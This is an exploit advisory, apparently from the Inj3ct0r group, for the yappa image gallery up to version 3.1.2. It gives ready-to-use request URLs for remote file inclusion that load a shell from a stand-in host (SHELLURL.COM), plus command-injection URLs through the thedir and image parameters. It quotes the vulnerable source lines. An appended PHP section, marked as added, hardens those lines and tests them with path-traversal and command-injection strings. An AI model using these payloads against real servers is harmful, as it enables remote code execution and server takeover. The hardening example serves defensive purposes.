Yappa versions 3.1.2 and below suffer from remote file inclusion and command execution vulnerabilities.
# ----------------------------------------------------------------------------
# Remote File Inclusion Vulnerability and Remote Command Execution Vulnerability
# ----------------------------------------------------------------------------
yappa <= 3.1.2 (yappa.php)
--------------------------------------------------------------
# [+] Author : Sn!pEr.S!Te Hacker
# [+] Email : Sniper-site@HoTmaiL.Com
# [+] Inj3ct0r Team Hacker #
# [+] 9-7-2010
# [+] Script : Image Galleries » yappa
# [+] Version: [3.1.2]
# [+] Download: http://manu.agat.net/yappa/yappa.txt
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
-=[ exploit ]=-
http://localhost/yappa/yappa.php?[basedir/config.php]=http://SHELLURL.COM ?
http://127.0.0.1/yappa/yappa.php?[realpath/config.php]=http://SHELLURL.COM ?
-=[ exploit 2 ]=-
http://localhost/yappa/yappa.php?thedir=[your command]
http://127.0.0.1/yappa/yappa.php?image=[your command]
include("$basedir/config.php")    (line 892)
include("$realpath/config.php")    (line 919)
system("jhead \"".rawurlencode($thedir.$image)."\"");    (line 672)
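
Hardened counterparts of the three statements listed above, as an added example that is not part of the original advisory or of yappa's code. It assumes config.php sits beside the script and that all images live under one gallery root; GALLERY_ROOT, resolve_image() and jhead_info() are hypothetical names.

```php
<?php
// Added example, not yappa's own code. GALLERY_ROOT, resolve_image() and
// jhead_info() are hypothetical names; the inputs below are constructed.
// Defence in depth in php.ini: allow_url_include = Off.

// Lines 892/919: the include base is a server-side constant, so no request
// parameter can redirect it to another path or URL.
define('GALLERY_ROOT', __DIR__);
if (is_file(GALLERY_ROOT . '/config.php')) {
    require GALLERY_ROOT . '/config.php';
}

// Line 672, step 1: canonicalise the requested file and refuse anything
// that is missing, outside the gallery root, or not a JPEG.
function resolve_image(string $root, string $thedir, string $image): ?string
{
    $rootReal = realpath($root);
    $full     = realpath($root . '/' . $thedir . '/' . $image);
    if ($rootReal === false || $full === false || !is_file($full)) {
        return null;
    }
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return preg_match('/\.jpe?g$/i', $full) === 1 ? $full : null;
}

// Line 672, step 2: escapeshellarg() is PHP's shell-quoting function;
// rawurlencode() is a URL encoder and was never meant for this job.
// realpath() returned an absolute path, so it cannot be read as an option.
function jhead_info(string $path): array
{
    $out = [];
    $status = 1;
    exec('jhead ' . escapeshellarg($path), $out, $status);
    return $status === 0 ? $out : [];
}

// Constructed inputs: only a real JPEG inside the root reaches jhead.
foreach (['photo.jpg', '../../etc/passwd', 'a.jpg"; id; "'] as $image) {
    $path = resolve_image(GALLERY_ROOT, 'album', $image);
    if ($path === null) {
        echo "rejected: $image\n";
        continue;
    }
    echo implode("\n", jhead_info($path)), "\n";
}
```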
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=========================| -=[ THE END]=- |=========================